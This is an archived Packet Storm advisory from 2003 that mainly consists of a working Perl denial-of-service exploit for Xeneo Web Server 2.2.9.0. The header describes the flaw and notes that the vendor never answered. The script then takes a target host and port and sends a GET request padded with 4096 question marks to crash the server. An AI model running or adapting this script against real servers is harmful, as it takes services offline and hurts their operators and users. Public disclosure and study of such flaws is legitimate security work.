sp-xeneo.pl

2003-04-22T00:00:00
ID PACKETSTORM:31045
Type packetstorm
Reporter Badpack3t
Modified 2003-04-22T00:00:00

Description

                                        
                                            `##!/usr/bin/perl  
#  
#  
#  
#SP Research Labs Advisory x03  
#-----------------------------  
#www.security-protocols.com  
#  
#Product - Xeneo Web Server 2.2.9.0  
#  
#Download it here:  
#http://www.northernsolutions.com/index.php?view=product&id=1  
#  
#Date Released - 04/21/2003  
#  
#Release Mode - Vendor was notified on 3/18/2003. Sent a few emails but  
#never got any replies. So here it goes.  
#  
#----------------------------  
#  
#Product Description from the vendor -  
#  
#Xeneo Web Server is designed to deliver high performance and  
#reliability. It can be easily extended and customized to host  
#everything from a personal web site to advanced web applications  
#that use ASP, PHP, ColdFusion, Perl, CGI and ISAPI. Key Xeneo  
#Web Server features include: multiple domain support, integrated  
#Windows authentication, scripting interface, enhanced filter  
#support, ISAPI, CGI, ASP, SSL, intelligent file caching and more.  
#  
#-----------------------------  
#  
#Vulnerability Description -  
#  
#To exploit this vulnerability, simply do a GET / with 4096 ?'s or more  
#will cause the web server to go down. It is not exploitable at this  
#point.  
#  
#Tested on:  
#  
#Windows XP Pro SP1  
#Windows 2000 SP3  
#  
#  
# Xeneo Web Server DoS   
#  
# Vulnerable systems:  
# Xeneo. Web Server 2.2.9.0  
# http://www.northernsolutions.com  
#   
# Written by badpack3t <badpack3t@security-protocols.com>  
# For SP Research Labs  
# 04/21/2003  
#   
# www.security-protocols.com  
#   
# usage:   
# perl sp-xeneo.pl <target> <port>  
#  
# big ups 2: c0nnie!!!! 143~!~!~!  
  
use IO::Socket;  
use strict;  
  
print ".:."x 20; print "\nXeneo Web Server 2.2.9.0 DoS, <badpack3t\@security-protocols.com>\n";  
print ".:."x 20; print "\n\n";  
  
if( !defined( $ARGV[ 0 ] && $ARGV[ 1 ]))  
{  
&usage;  
}  
  
my $host = $ARGV[ 0 ];  
my $def = "?";  
my $num = "4096";  
my $port = $ARGV[ 1 ];  
my $urfuqed = $def x $num;  
  
my $tcpval = getprotobyname( 'tcp' );  
my $serverIP = inet_aton( $host );  
my $serverAddr = sockaddr_in( $ARGV[ 1 ], $serverIP );  
my $protocol_name = "tcp";  
  
my $iaddr = inet_aton( $host ) || die ( "host was not found: $host" );  
my $paddr = sockaddr_in( $port, $iaddr ) || die ( "you did something wrong stupid... exiting..." );  
my $proto = getprotobyname( 'tcp' ) || die ( "cannot get protocol" );  
socket( SOCK, PF_INET, SOCK_STREAM, $proto ) || die ( "socket could not open: $host" );  
connect( SOCK, $paddr ) || die ( "cannot connect to: $host" );  
  
my $submit = "GET /$urfuqed HTTP/1.0\r\n\r\n";   
send( SOCK,$submit,0 );  
close( SOCK );  
  
sub usage   
{  
die( "\n\nUsage: perl $0 <target_host> <port>\n\n" );  
}  
  
print "\n.:.:.:.:.:.:.:.:.:.:.:.";  
print "\ncrash was successful ~!\n";  
print "\.:.:.:.:.:.:.:.:.:.:.:.\n";  
`